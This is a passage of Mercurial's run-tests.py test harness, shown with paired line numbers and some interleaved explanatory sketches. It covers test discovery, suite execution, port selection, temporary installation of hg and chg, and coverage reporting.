3198 if casestr:
3196 if casestr:
3199 case = casestr.split(b'#')
3197 case = casestr.split(b'#')
3200 else:
3198 else:
3201 continue
3199 continue
3202
3200
3203 if t.endswith(b'.t'):
3201 if t.endswith(b'.t'):
3204 # .t file may contain multiple test cases
3202 # .t file may contain multiple test cases
3205 casedimensions = parsettestcases(t)
3203 casedimensions = parsettestcases(t)
3206 if casedimensions:
3204 if casedimensions:
3207 cases = []
3205 cases = []
3208
3206
3209 def addcases(case, casedimensions):
3207 def addcases(case, casedimensions):
3210 if not casedimensions:
3208 if not casedimensions:
3211 cases.append(case)
3209 cases.append(case)
3212 else:
3210 else:
3213 for c in casedimensions[0]:
3211 for c in casedimensions[0]:
3214 addcases(case + [c], casedimensions[1:])
3212 addcases(case + [c], casedimensions[1:])
3215
3213
3216 addcases([], casedimensions)
3214 addcases([], casedimensions)
3217 if case and case in cases:
3215 if case and case in cases:
3218 cases = [case]
3216 cases = [case]
3219 elif case:
3217 elif case:
3220 # Ignore invalid cases
3218 # Ignore invalid cases
3221 cases = []
3219 cases = []
3222 else:
3220 else:
3223 pass
3221 pass
3224 tests += [{'path': t, 'case': c} for c in sorted(cases)]
3222 tests += [{'path': t, 'case': c} for c in sorted(cases)]
3225 else:
3223 else:
3226 tests.append({'path': t})
3224 tests.append({'path': t})
3227 else:
3225 else:
3228 tests.append({'path': t})
3226 tests.append({'path': t})
3229 return tests
3227 return tests
3230
3228
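# Editorial sketch of the extension point described in the findtests() docstring above,
# assuming this module's TestRunner class is in scope; the subclass name and the
# injected test path are hypothetical.
class CustomTestRunner(TestRunner):
    def findtests(self, args):
        tests = super(CustomTestRunner, self).findtests(args)
        # Inject an extra test description using the same dict shape returned above.
        tests.append({'path': b'test-custom.t'})
        return tests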
3231 def _runtests(self, testdescs):
3229 def _runtests(self, testdescs):
3232 def _reloadtest(test, i):
3230 def _reloadtest(test, i):
3233 # convert a test back to its description dict
3231 # convert a test back to its description dict
3234 desc = {'path': test.path}
3232 desc = {'path': test.path}
3235 case = getattr(test, '_case', [])
3233 case = getattr(test, '_case', [])
3236 if case:
3234 if case:
3237 desc['case'] = case
3235 desc['case'] = case
3238 return self._gettest(desc, i)
3236 return self._gettest(desc, i)
3239
3237
3240 try:
3238 try:
3241 if self.options.restart:
3239 if self.options.restart:
3242 orig = list(testdescs)
3240 orig = list(testdescs)
3243 while testdescs:
3241 while testdescs:
3244 desc = testdescs[0]
3242 desc = testdescs[0]
3245 # desc['path'] is a relative path
3243 # desc['path'] is a relative path
3246 if 'case' in desc:
3244 if 'case' in desc:
3247 casestr = b'#'.join(desc['case'])
3245 casestr = b'#'.join(desc['case'])
3248 errpath = b'%s#%s.err' % (desc['path'], casestr)
3246 errpath = b'%s#%s.err' % (desc['path'], casestr)
3249 else:
3247 else:
3250 errpath = b'%s.err' % desc['path']
3248 errpath = b'%s.err' % desc['path']
3251 errpath = os.path.join(self._outputdir, errpath)
3249 errpath = os.path.join(self._outputdir, errpath)
3252 if os.path.exists(errpath):
3250 if os.path.exists(errpath):
3253 break
3251 break
3254 testdescs.pop(0)
3252 testdescs.pop(0)
3255 if not testdescs:
3253 if not testdescs:
3256 print("running all tests")
3254 print("running all tests")
3257 testdescs = orig
3255 testdescs = orig
3258
3256
3259 tests = [self._gettest(d, i) for i, d in enumerate(testdescs)]
3257 tests = [self._gettest(d, i) for i, d in enumerate(testdescs)]
3260 num_tests = len(tests) * self.options.runs_per_test
3258 num_tests = len(tests) * self.options.runs_per_test
3261
3259
3262 jobs = min(num_tests, self.options.jobs)
3260 jobs = min(num_tests, self.options.jobs)
3263
3261
3264 failed = False
3262 failed = False
3265 kws = self.options.keywords
3263 kws = self.options.keywords
3266 if kws is not None and PYTHON3:
3264 if kws is not None and PYTHON3:
3267 kws = kws.encode('utf-8')
3265 kws = kws.encode('utf-8')
3268
3266
3269 suite = TestSuite(
3267 suite = TestSuite(
3270 self._testdir,
3268 self._testdir,
3271 jobs=jobs,
3269 jobs=jobs,
3272 whitelist=self.options.whitelisted,
3270 whitelist=self.options.whitelisted,
3273 blacklist=self.options.blacklist,
3271 blacklist=self.options.blacklist,
3274 retest=self.options.retest,
3272 retest=self.options.retest,
3275 keywords=kws,
3273 keywords=kws,
3276 loop=self.options.loop,
3274 loop=self.options.loop,
3277 runs_per_test=self.options.runs_per_test,
3275 runs_per_test=self.options.runs_per_test,
3278 showchannels=self.options.showchannels,
3276 showchannels=self.options.showchannels,
3279 tests=tests,
3277 tests=tests,
3280 loadtest=_reloadtest,
3278 loadtest=_reloadtest,
3281 )
3279 )
3282 verbosity = 1
3280 verbosity = 1
3283 if self.options.list_tests:
3281 if self.options.list_tests:
3284 verbosity = 0
3282 verbosity = 0
3285 elif self.options.verbose:
3283 elif self.options.verbose:
3286 verbosity = 2
3284 verbosity = 2
3287 runner = TextTestRunner(self, verbosity=verbosity)
3285 runner = TextTestRunner(self, verbosity=verbosity)
3288
3286
3289 if self.options.list_tests:
3287 if self.options.list_tests:
3290 result = runner.listtests(suite)
3288 result = runner.listtests(suite)
3291 else:
3289 else:
3292 if self._installdir:
3290 if self._installdir:
3293 self._installhg()
3291 self._installhg()
3294 self._checkhglib("Testing")
3292 self._checkhglib("Testing")
3295 else:
3293 else:
3296 self._usecorrectpython()
3294 self._usecorrectpython()
3297 if self.options.chg:
3295 if self.options.chg:
3298 assert self._installdir
3296 assert self._installdir
3299 self._installchg()
3297 self._installchg()
3300
3298
3301 log(
3299 log(
3302 'running %d tests using %d parallel processes'
3300 'running %d tests using %d parallel processes'
3303 % (num_tests, jobs)
3301 % (num_tests, jobs)
3304 )
3302 )
3305
3303
3306 result = runner.run(suite)
3304 result = runner.run(suite)
3307
3305
3308 if result.failures or result.errors:
3306 if result.failures or result.errors:
3309 failed = True
3307 failed = True
3310
3308
3311 result.onEnd()
3309 result.onEnd()
3312
3310
3313 if self.options.anycoverage:
3311 if self.options.anycoverage:
3314 self._outputcoverage()
3312 self._outputcoverage()
3315 except KeyboardInterrupt:
3313 except KeyboardInterrupt:
3316 failed = True
3314 failed = True
3317 print("\ninterrupted!")
3315 print("\ninterrupted!")
3318
3316
3319 if failed:
3317 if failed:
3320 return 1
3318 return 1
3321
3319
3322 def _getport(self, count):
3320 def _getport(self, count):
3323 port = self._ports.get(count) # do we have a cached entry?
3321 port = self._ports.get(count) # do we have a cached entry?
3324 if port is None:
3322 if port is None:
3325 portneeded = 3
3323 portneeded = 3
3326 # above 100 tries we just give up and let the test report the failure
3324 # above 100 tries we just give up and let the test report the failure
3327 for tries in xrange(100):
3325 for tries in xrange(100):
3328 allfree = True
3326 allfree = True
3329 port = self.options.port + self._portoffset
3327 port = self.options.port + self._portoffset
3330 for idx in xrange(portneeded):
3328 for idx in xrange(portneeded):
3331 if not checkportisavailable(port + idx):
3329 if not checkportisavailable(port + idx):
3332 allfree = False
3330 allfree = False
3333 break
3331 break
3334 self._portoffset += portneeded
3332 self._portoffset += portneeded
3335 if allfree:
3333 if allfree:
3336 break
3334 break
3337 self._ports[count] = port
3335 self._ports[count] = port
3338 return port
3336 return port
3339
3337
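# Editorial sketch: checkportisavailable() used by _getport() above is defined earlier
# in run-tests.py; the helper below is only a rough standalone approximation of such a
# probe (bind a TCP socket and see whether it succeeds), not the harness's own code.
import socket

def _portisfree(port):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.bind(('localhost', port))
        return True
    except socket.error:
        return False
    finally:
        s.close()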
3340 def _gettest(self, testdesc, count):
3338 def _gettest(self, testdesc, count):
3341 """Obtain a Test by looking at its filename.
3339 """Obtain a Test by looking at its filename.
3342
3340
3343 Returns a Test instance. The Test may not be runnable if it doesn't
3341 Returns a Test instance. The Test may not be runnable if it doesn't
3344 map to a known type.
3342 map to a known type.
3345 """
3343 """
3346 path = testdesc['path']
3344 path = testdesc['path']
3347 lctest = path.lower()
3345 lctest = path.lower()
3348 testcls = Test
3346 testcls = Test
3349
3347
3350 for ext, cls in self.TESTTYPES:
3348 for ext, cls in self.TESTTYPES:
3351 if lctest.endswith(ext):
3349 if lctest.endswith(ext):
3352 testcls = cls
3350 testcls = cls
3353 break
3351 break
3354
3352
3355 refpath = os.path.join(getcwdb(), path)
3353 refpath = os.path.join(getcwdb(), path)
3356 tmpdir = os.path.join(self._hgtmp, b'child%d' % count)
3354 tmpdir = os.path.join(self._hgtmp, b'child%d' % count)
3357
3355
3358 # extra keyword parameters. 'case' is used by .t tests
3356 # extra keyword parameters. 'case' is used by .t tests
3359 kwds = dict((k, testdesc[k]) for k in ['case'] if k in testdesc)
3357 kwds = dict((k, testdesc[k]) for k in ['case'] if k in testdesc)
3360
3358
3361 t = testcls(
3359 t = testcls(
3362 refpath,
3360 refpath,
3363 self._outputdir,
3361 self._outputdir,
3364 tmpdir,
3362 tmpdir,
3365 keeptmpdir=self.options.keep_tmpdir,
3363 keeptmpdir=self.options.keep_tmpdir,
3366 debug=self.options.debug,
3364 debug=self.options.debug,
3367 first=self.options.first,
3365 first=self.options.first,
3368 timeout=self.options.timeout,
3366 timeout=self.options.timeout,
3369 startport=self._getport(count),
3367 startport=self._getport(count),
3370 extraconfigopts=self.options.extra_config_opt,
3368 extraconfigopts=self.options.extra_config_opt,
3371 py3warnings=self.options.py3_warnings,
3369 py3warnings=self.options.py3_warnings,
3372 shell=self.options.shell,
3370 shell=self.options.shell,
3373 hgcommand=self._hgcommand,
3371 hgcommand=self._hgcommand,
3374 usechg=bool(self.options.with_chg or self.options.chg),
3372 usechg=bool(self.options.with_chg or self.options.chg),
3375 useipv6=useipv6,
3373 useipv6=useipv6,
3376 **kwds
3374 **kwds
3377 )
3375 )
3378 t.should_reload = True
3376 t.should_reload = True
3379 return t
3377 return t
3380
3378
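# Editorial sketch of the suffix dispatch _gettest() performs through TESTTYPES above:
# walk (extension, handler) pairs and fall back to a default. The labels below stand in
# for the real Test subclasses, which are defined elsewhere in run-tests.py.
_SUFFIXTABLE = [(b'.t', 'shell-style test'), (b'.py', 'python test')]

def _kindfor(path, default='unknown'):
    lower = path.lower()
    for ext, kind in _SUFFIXTABLE:
        if lower.endswith(ext):
            return kind
    return default

assert _kindfor(b'test-example.t') == 'shell-style test'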
3381 def _cleanup(self):
3379 def _cleanup(self):
3382 """Clean up state from this test invocation."""
3380 """Clean up state from this test invocation."""
3383 if self.options.keep_tmpdir:
3381 if self.options.keep_tmpdir:
3384 return
3382 return
3385
3383
3386 vlog("# Cleaning up HGTMP", _strpath(self._hgtmp))
3384 vlog("# Cleaning up HGTMP", _strpath(self._hgtmp))
3387 shutil.rmtree(self._hgtmp, True)
3385 shutil.rmtree(self._hgtmp, True)
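# Editorial aside: the positional True above is shutil.rmtree's ignore_errors flag,
# so a partially removed HGTMP directory does not abort cleanup.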
3388 for f in self._createdfiles:
3386 for f in self._createdfiles:
3389 try:
3387 try:
3390 os.remove(f)
3388 os.remove(f)
3391 except OSError:
3389 except OSError:
3392 pass
3390 pass
3393
3391
3394 def _usecorrectpython(self):
3392 def _usecorrectpython(self):
3395 """Configure the environment to use the appropriate Python in tests."""
3393 """Configure the environment to use the appropriate Python in tests."""
3396 # Tests must use the same interpreter as us or bad things will happen.
3394 # Tests must use the same interpreter as us or bad things will happen.
3397 pyexename = sys.platform == 'win32' and b'python.exe' or b'python'
3395 pyexename = sys.platform == 'win32' and b'python.exe' or b'python'
3398
3396
3399 # os.symlink() is a thing with py3 on Windows, but it requires
3397 # os.symlink() is a thing with py3 on Windows, but it requires
3400 # Administrator rights.
3398 # Administrator rights.
3401 if getattr(os, 'symlink', None) and os.name != 'nt':
3399 if getattr(os, 'symlink', None) and os.name != 'nt':
3402 vlog(
3400 vlog(
3403 "# Making python executable in test path a symlink to '%s'"
3401 "# Making python executable in test path a symlink to '%s'"
3404 % sysexecutable
3402 % sysexecutable
3405 )
3403 )
3406 mypython = os.path.join(self._tmpbindir, pyexename)
3404 mypython = os.path.join(self._tmpbindir, pyexename)
3407 try:
3405 try:
3408 if os.readlink(mypython) == sysexecutable:
3406 if os.readlink(mypython) == sysexecutable:
3409 return
3407 return
3410 os.unlink(mypython)
3408 os.unlink(mypython)
3411 except OSError as err:
3409 except OSError as err:
3412 if err.errno != errno.ENOENT:
3410 if err.errno != errno.ENOENT:
3413 raise
3411 raise
3414 if self._findprogram(pyexename) != sysexecutable:
3412 if self._findprogram(pyexename) != sysexecutable:
3415 try:
3413 try:
3416 os.symlink(sysexecutable, mypython)
3414 os.symlink(sysexecutable, mypython)
3417 self._createdfiles.append(mypython)
3415 self._createdfiles.append(mypython)
3418 except OSError as err:
3416 except OSError as err:
3419 # child processes may race, which is harmless
3417 # child processes may race, which is harmless
3420 if err.errno != errno.EEXIST:
3418 if err.errno != errno.EEXIST:
3421 raise
3419 raise
3422 else:
3420 else:
3423 exedir, exename = os.path.split(sysexecutable)
3421 exedir, exename = os.path.split(sysexecutable)
3424 vlog(
3422 vlog(
3425 "# Modifying search path to find %s as %s in '%s'"
3423 "# Modifying search path to find %s as %s in '%s'"
3426 % (exename, pyexename, exedir)
3424 % (exename, pyexename, exedir)
3427 )
3425 )
3428 path = os.environ['PATH'].split(os.pathsep)
3426 path = os.environ['PATH'].split(os.pathsep)
3429 while exedir in path:
3427 while exedir in path:
3430 path.remove(exedir)
3428 path.remove(exedir)
3431 os.environ['PATH'] = os.pathsep.join([exedir] + path)
3429 os.environ['PATH'] = os.pathsep.join([exedir] + path)
3432 if not self._findprogram(pyexename):
3430 if not self._findprogram(pyexename):
3433 print("WARNING: Cannot find %s in search path" % pyexename)
3431 print("WARNING: Cannot find %s in search path" % pyexename)
3434
3432
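# Editorial sketch of the strategy _usecorrectpython() applies on platforms with
# symlink support: expose the running interpreter under the plain name "python" in a
# directory the harness puts on PATH. The helper name and paths are illustrative.
import os
import sys

def _exposepython(bindir):
    target = os.path.join(bindir, 'python')
    if not os.path.exists(target):
        os.symlink(sys.executable, target)
    return target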
3435 def _installhg(self):
3433 def _installhg(self):
3436 """Install hg into the test environment.
3434 """Install hg into the test environment.
3437
3435
3438 This will also configure hg with the appropriate testing settings.
3436 This will also configure hg with the appropriate testing settings.
3439 """
3437 """
3440 vlog("# Performing temporary installation of HG")
3438 vlog("# Performing temporary installation of HG")
3441 installerrs = os.path.join(self._hgtmp, b"install.err")
3439 installerrs = os.path.join(self._hgtmp, b"install.err")
3442 compiler = ''
3440 compiler = ''
3443 if self.options.compiler:
3441 if self.options.compiler:
3444 compiler = '--compiler ' + self.options.compiler
3442 compiler = '--compiler ' + self.options.compiler
3445 if self.options.pure:
3443 if self.options.pure:
3446 pure = b"--pure"
3444 pure = b"--pure"
3447 else:
3445 else:
3448 pure = b""
3446 pure = b""
3449
3447
3450 # Run installer in hg root
3448 # Run installer in hg root
3451 script = os.path.realpath(sys.argv[0])
3449 script = os.path.realpath(sys.argv[0])
3452 exe = sysexecutable
3450 exe = sysexecutable
3453 if PYTHON3:
3451 if PYTHON3:
3454 compiler = _bytespath(compiler)
3452 compiler = _bytespath(compiler)
3455 script = _bytespath(script)
3453 script = _bytespath(script)
3456 exe = _bytespath(exe)
3454 exe = _bytespath(exe)
3457 hgroot = os.path.dirname(os.path.dirname(script))
3455 hgroot = os.path.dirname(os.path.dirname(script))
3458 self._hgroot = hgroot
3456 self._hgroot = hgroot
3459 os.chdir(hgroot)
3457 os.chdir(hgroot)
3460 nohome = b'--home=""'
3458 nohome = b'--home=""'
3461 if os.name == 'nt':
3459 if os.name == 'nt':
3462 # The --home="" trick works only on OSes where os.sep == '/'
3460 # The --home="" trick works only on OSes where os.sep == '/'
3463 # because of a distutils convert_path() fast-path. Avoid it at
3461 # because of a distutils convert_path() fast-path. Avoid it at
3464 # least on Windows for now, deal with .pydistutils.cfg bugs
3462 # least on Windows for now, deal with .pydistutils.cfg bugs
3465 # when they happen.
3463 # when they happen.
3466 nohome = b''
3464 nohome = b''
3467 cmd = (
3465 cmd = (
3468 b'"%(exe)s" setup.py %(pure)s clean --all'
3466 b'"%(exe)s" setup.py %(pure)s clean --all'
3469 b' build %(compiler)s --build-base="%(base)s"'
3467 b' build %(compiler)s --build-base="%(base)s"'
3470 b' install --force --prefix="%(prefix)s"'
3468 b' install --force --prefix="%(prefix)s"'
3471 b' --install-lib="%(libdir)s"'
3469 b' --install-lib="%(libdir)s"'
3472 b' --install-scripts="%(bindir)s" %(nohome)s >%(logfile)s 2>&1'
3470 b' --install-scripts="%(bindir)s" %(nohome)s >%(logfile)s 2>&1'
3473 % {
3471 % {
3474 b'exe': exe,
3472 b'exe': exe,
3475 b'pure': pure,
3473 b'pure': pure,
3476 b'compiler': compiler,
3474 b'compiler': compiler,
3477 b'base': os.path.join(self._hgtmp, b"build"),
3475 b'base': os.path.join(self._hgtmp, b"build"),
3478 b'prefix': self._installdir,
3476 b'prefix': self._installdir,
3479 b'libdir': self._pythondir,
3477 b'libdir': self._pythondir,
3480 b'bindir': self._bindir,
3478 b'bindir': self._bindir,
3481 b'nohome': nohome,
3479 b'nohome': nohome,
3482 b'logfile': installerrs,
3480 b'logfile': installerrs,
3483 }
3481 }
3484 )
3482 )
3485
3483
3486 # setuptools requires install directories to exist.
3484 # setuptools requires install directories to exist.
3487 def makedirs(p):
3485 def makedirs(p):
3488 try:
3486 try:
3489 os.makedirs(p)
3487 os.makedirs(p)
3490 except OSError as e:
3488 except OSError as e:
3491 if e.errno != errno.EEXIST:
3489 if e.errno != errno.EEXIST:
3492 raise
3490 raise
3493
3491
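# Editorial aside: on Python 3 the EEXIST handling in the makedirs() helper above
# collapses to a standard-library flag, e.g. os.makedirs(p, exist_ok=True); the
# try/except form is kept for Python 2 compatibility.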
3494 makedirs(self._pythondir)
3492 makedirs(self._pythondir)
3495 makedirs(self._bindir)
3493 makedirs(self._bindir)
3496
3494
3497 vlog("# Running", cmd.decode("utf-8"))
3495 vlog("# Running", cmd.decode("utf-8"))
3498 if subprocess.call(_strpath(cmd), shell=True) == 0:
3496 if subprocess.call(_strpath(cmd), shell=True) == 0:
3499 if not self.options.verbose:
3497 if not self.options.verbose:
3500 try:
3498 try:
3501 os.remove(installerrs)
3499 os.remove(installerrs)
3502 except OSError as e:
3500 except OSError as e:
3503 if e.errno != errno.ENOENT:
3501 if e.errno != errno.ENOENT:
3504 raise
3502 raise
3505 else:
3503 else:
3506 with open(installerrs, 'rb') as f:
3504 with open(installerrs, 'rb') as f:
3507 for line in f:
3505 for line in f:
3508 if PYTHON3:
3506 if PYTHON3:
3509 sys.stdout.buffer.write(line)
3507 sys.stdout.buffer.write(line)
3510 else:
3508 else:
3511 sys.stdout.write(line)
3509 sys.stdout.write(line)
3512 sys.exit(1)
3510 sys.exit(1)
3513 os.chdir(self._testdir)
3511 os.chdir(self._testdir)
3514
3512
3515 self._usecorrectpython()
3513 self._usecorrectpython()
3516
3514
3517 if self.options.py3_warnings and not self.options.anycoverage:
3515 if self.options.py3_warnings and not self.options.anycoverage:
3518 vlog("# Updating hg command to enable Py3k Warnings switch")
3516 vlog("# Updating hg command to enable Py3k Warnings switch")
3519 with open(os.path.join(self._bindir, 'hg'), 'rb') as f:
3517 with open(os.path.join(self._bindir, 'hg'), 'rb') as f:
3520 lines = [line.rstrip() for line in f]
3518 lines = [line.rstrip() for line in f]
3521 lines[0] += ' -3'
3519 lines[0] += ' -3'
3522 with open(os.path.join(self._bindir, 'hg'), 'wb') as f:
3520 with open(os.path.join(self._bindir, 'hg'), 'wb') as f:
3523 for line in lines:
3521 for line in lines:
3524 f.write(line + '\n')
3522 f.write(line + '\n')
3525
3523
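# Editorial aside: the loop above appends ' -3' to the installed hg script's shebang
# line, the CPython 2 switch that enables Py3k warnings, matching the vlog message.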
3526 hgbat = os.path.join(self._bindir, b'hg.bat')
3524 hgbat = os.path.join(self._bindir, b'hg.bat')
3527 if os.path.isfile(hgbat):
3525 if os.path.isfile(hgbat):
3528 # hg.bat expects to be put in bin/scripts while run-tests.py
3526 # hg.bat expects to be put in bin/scripts while run-tests.py
3529 # installation layout puts it in bin/ directly. Fix it
3527 # installation layout puts it in bin/ directly. Fix it
3530 with open(hgbat, 'rb') as f:
3528 with open(hgbat, 'rb') as f:
3531 data = f.read()
3529 data = f.read()
3532 if br'"%~dp0..\python" "%~dp0hg" %*' in data:
3530 if br'"%~dp0..\python" "%~dp0hg" %*' in data:
3533 data = data.replace(
3531 data = data.replace(
3534 br'"%~dp0..\python" "%~dp0hg" %*',
3532 br'"%~dp0..\python" "%~dp0hg" %*',
3535 b'"%~dp0python" "%~dp0hg" %*',
3533 b'"%~dp0python" "%~dp0hg" %*',
3536 )
3534 )
3537 with open(hgbat, 'wb') as f:
3535 with open(hgbat, 'wb') as f:
3538 f.write(data)
3536 f.write(data)
3539 else:
3537 else:
3540 print('WARNING: cannot fix hg.bat reference to python.exe')
3538 print('WARNING: cannot fix hg.bat reference to python.exe')
3541
3539
3542 if self.options.anycoverage:
3540 if self.options.anycoverage:
3543 custom = os.path.join(
3541 custom = os.path.join(
3544 osenvironb[b'RUNTESTDIR'], b'sitecustomize.py'
3542 osenvironb[b'RUNTESTDIR'], b'sitecustomize.py'
3545 )
3543 )
3546 target = os.path.join(self._pythondir, b'sitecustomize.py')
3544 target = os.path.join(self._pythondir, b'sitecustomize.py')
3547 vlog('# Installing coverage trigger to %s' % target)
3545 vlog('# Installing coverage trigger to %s' % target)
3548 shutil.copyfile(custom, target)
3546 shutil.copyfile(custom, target)
3549 rc = os.path.join(self._testdir, b'.coveragerc')
3547 rc = os.path.join(self._testdir, b'.coveragerc')
3550 vlog('# Installing coverage rc to %s' % rc)
3548 vlog('# Installing coverage rc to %s' % rc)
3551 osenvironb[b'COVERAGE_PROCESS_START'] = rc
3549 osenvironb[b'COVERAGE_PROCESS_START'] = rc
3552 covdir = os.path.join(self._installdir, b'..', b'coverage')
3550 covdir = os.path.join(self._installdir, b'..', b'coverage')
3553 try:
3551 try:
3554 os.mkdir(covdir)
3552 os.mkdir(covdir)
3555 except OSError as e:
3553 except OSError as e:
3556 if e.errno != errno.EEXIST:
3554 if e.errno != errno.EEXIST:
3557 raise
3555 raise
3558
3556
3559 osenvironb[b'COVERAGE_DIR'] = covdir
3557 osenvironb[b'COVERAGE_DIR'] = covdir
3560
3558
3561 def _checkhglib(self, verb):
3559 def _checkhglib(self, verb):
3562 """Ensure that the 'mercurial' package imported by python is
3560 """Ensure that the 'mercurial' package imported by python is
3563 the one we expect it to be. If not, print a warning to stderr."""
3561 the one we expect it to be. If not, print a warning to stderr."""
3564 if (self._bindir == self._pythondir) and (
3562 if (self._bindir == self._pythondir) and (
3565 self._bindir != self._tmpbindir
3563 self._bindir != self._tmpbindir
3566 ):
3564 ):
3567 # The pythondir has been inferred from --with-hg flag.
3565 # The pythondir has been inferred from --with-hg flag.
3568 # We cannot expect anything sensible here.
3566 # We cannot expect anything sensible here.
3569 return
3567 return
3570 expecthg = os.path.join(self._pythondir, b'mercurial')
3568 expecthg = os.path.join(self._pythondir, b'mercurial')
3571 actualhg = self._gethgpath()
3569 actualhg = self._gethgpath()
3572 if os.path.abspath(actualhg) != os.path.abspath(expecthg):
3570 if os.path.abspath(actualhg) != os.path.abspath(expecthg):
3573 sys.stderr.write(
3571 sys.stderr.write(
3574 'warning: %s with unexpected mercurial lib: %s\n'
3572 'warning: %s with unexpected mercurial lib: %s\n'
3575 ' (expected %s)\n' % (verb, actualhg, expecthg)
3573 ' (expected %s)\n' % (verb, actualhg, expecthg)
3576 )
3574 )
3577
3575
3578 def _gethgpath(self):
3576 def _gethgpath(self):
3579 """Return the path to the mercurial package that is actually found by
3577 """Return the path to the mercurial package that is actually found by
3580 the current Python interpreter."""
3578 the current Python interpreter."""
3581 if self._hgpath is not None:
3579 if self._hgpath is not None:
3582 return self._hgpath
3580 return self._hgpath
3583
3581
3584 cmd = b'"%s" -c "import mercurial; print (mercurial.__path__[0])"'
3582 cmd = b'"%s" -c "import mercurial; print (mercurial.__path__[0])"'
3585 cmd = cmd % PYTHON
3583 cmd = cmd % PYTHON
3586 if PYTHON3:
3584 if PYTHON3:
3587 cmd = _strpath(cmd)
3585 cmd = _strpath(cmd)
3588
3586
3589 p = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
3587 p = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
3590 out, err = p.communicate()
3588 out, err = p.communicate()
3591
3589
3592 self._hgpath = out.strip()
3590 self._hgpath = out.strip()
3593
3591
3594 return self._hgpath
3592 return self._hgpath
3595
3593
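# Editorial sketch of the probe _gethgpath() runs above, using an argv list instead of
# the shell string; the 'python' parameter stands for the interpreter path the harness
# invokes, and the helper name is illustrative.
import subprocess

def _whichmercurial(python):
    out = subprocess.check_output(
        [python, '-c', 'import mercurial; print(mercurial.__path__[0])']
    )
    return out.strip()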
3596 def _installchg(self):
3594 def _installchg(self):
3597 """Install chg into the test environment"""
3595 """Install chg into the test environment"""
3598 vlog('# Performing temporary installation of CHG')
3596 vlog('# Performing temporary installation of CHG')
3599 assert os.path.dirname(self._bindir) == self._installdir
3597 assert os.path.dirname(self._bindir) == self._installdir
3600 assert self._hgroot, 'must be called after _installhg()'
3598 assert self._hgroot, 'must be called after _installhg()'
3601 cmd = b'"%(make)s" clean install PREFIX="%(prefix)s"' % {
3599 cmd = b'"%(make)s" clean install PREFIX="%(prefix)s"' % {
3602 b'make': b'make', # TODO: switch by option or environment?
3600 b'make': b'make', # TODO: switch by option or environment?
3603 b'prefix': self._installdir,
3601 b'prefix': self._installdir,
3604 }
3602 }
3605 cwd = os.path.join(self._hgroot, b'contrib', b'chg')
3603 cwd = os.path.join(self._hgroot, b'contrib', b'chg')
3606 vlog("# Running", cmd)
3604 vlog("# Running", cmd)
3607 proc = subprocess.Popen(
3605 proc = subprocess.Popen(
3608 cmd,
3606 cmd,
3609 shell=True,
3607 shell=True,
3610 cwd=cwd,
3608 cwd=cwd,
3611 stdin=subprocess.PIPE,
3609 stdin=subprocess.PIPE,
3612 stdout=subprocess.PIPE,
3610 stdout=subprocess.PIPE,
3613 stderr=subprocess.STDOUT,
3611 stderr=subprocess.STDOUT,
3614 )
3612 )
3615 out, _err = proc.communicate()
3613 out, _err = proc.communicate()
3616 if proc.returncode != 0:
3614 if proc.returncode != 0:
3617 if PYTHON3:
3615 if PYTHON3:
3618 sys.stdout.buffer.write(out)
3616 sys.stdout.buffer.write(out)
3619 else:
3617 else:
3620 sys.stdout.write(out)
3618 sys.stdout.write(out)
3621 sys.exit(1)
3619 sys.exit(1)
3622
3620
3623 def _outputcoverage(self):
3621 def _outputcoverage(self):
3624 """Produce code coverage output."""
3622 """Produce code coverage output."""
3625 import coverage
3623 import coverage
3626
3624
3627 coverage = coverage.coverage
3625 coverage = coverage.coverage
3628
3626
3629 vlog('# Producing coverage report')
3627 vlog('# Producing coverage report')
3630 # chdir is the easiest way to get short, relative paths in the
3628 # chdir is the easiest way to get short, relative paths in the
3631 # output.
3629 # output.
3632 os.chdir(self._hgroot)
3630 os.chdir(self._hgroot)
3633 covdir = os.path.join(_strpath(self._installdir), '..', 'coverage')
3631 covdir = os.path.join(_strpath(self._installdir), '..', 'coverage')
3634 cov = coverage(data_file=os.path.join(covdir, 'cov'))
3632 cov = coverage(data_file=os.path.join(covdir, 'cov'))
3635
3633
3636 # Map install directory paths back to source directory.
3634 # Map install directory paths back to source directory.
3637 cov.config.paths['srcdir'] = ['.', _strpath(self._pythondir)]
3635 cov.config.paths['srcdir'] = ['.', _strpath(self._pythondir)]
3638
3636
3639 cov.combine()
3637 cov.combine()
3640
3638
3641 omit = [
3639 omit = [
3642 _strpath(os.path.join(x, b'*'))
3640 _strpath(os.path.join(x, b'*'))
3643 for x in [self._bindir, self._testdir]
3641 for x in [self._bindir, self._testdir]
3644 ]
3642 ]
3645 cov.report(ignore_errors=True, omit=omit)
3643 cov.report(ignore_errors=True, omit=omit)
3646
3644
3647 if self.options.htmlcov:
3645 if self.options.htmlcov:
3648 htmldir = os.path.join(_strpath(self._outputdir), 'htmlcov')
3646 htmldir = os.path.join(_strpath(self._outputdir), 'htmlcov')
3649 cov.html_report(directory=htmldir, omit=omit)
3647 cov.html_report(directory=htmldir, omit=omit)
3650 if self.options.annotate:
3648 if self.options.annotate:
3651 adir = os.path.join(_strpath(self._outputdir), 'annotated')
3649 adir = os.path.join(_strpath(self._outputdir), 'annotated')
3652 if not os.path.isdir(adir):
3650 if not os.path.isdir(adir):
3653 os.mkdir(adir)
3651 os.mkdir(adir)
3654 cov.annotate(directory=adir, omit=omit)
3652 cov.annotate(directory=adir, omit=omit)
3655
3653
3656 def _findprogram(self, program):
3654 def _findprogram(self, program):
3657 """Search PATH for a executable program"""
3655 """Search PATH for a executable program"""
3658 dpb = _bytespath(os.defpath)
3656 dpb = _bytespath(os.defpath)
3659 sepb = _bytespath(os.pathsep)
3657 sepb = _bytespath(os.pathsep)
3660 for p in osenvironb.get(b'PATH', dpb).split(sepb):
3658 for p in osenvironb.get(b'PATH', dpb).split(sepb):
3661 name = os.path.join(p, program)
3659 name = os.path.join(p, program)
3662 if os.name == 'nt' or os.access(name, os.X_OK):
3660 if os.name == 'nt' or os.access(name, os.X_OK):
3663 return name
3661 return name
3664 return None
3662 return None
3665
3663
3666 def _checktools(self):
3664 def _checktools(self):
3667 """Ensure tools required to run tests are present."""
3665 """Ensure tools required to run tests are present."""
3668 for p in self.REQUIREDTOOLS:
3666 for p in self.REQUIREDTOOLS:
3669 if os.name == 'nt' and not p.endswith(b'.exe'):
3667 if os.name == 'nt' and not p.endswith(b'.exe'):
3670 p += b'.exe'
3668 p += b'.exe'
3671 found = self._findprogram(p)
3669 found = self._findprogram(p)
3672 p = p.decode("utf-8")
3670 p = p.decode("utf-8")
3673 if found:
3671 if found:
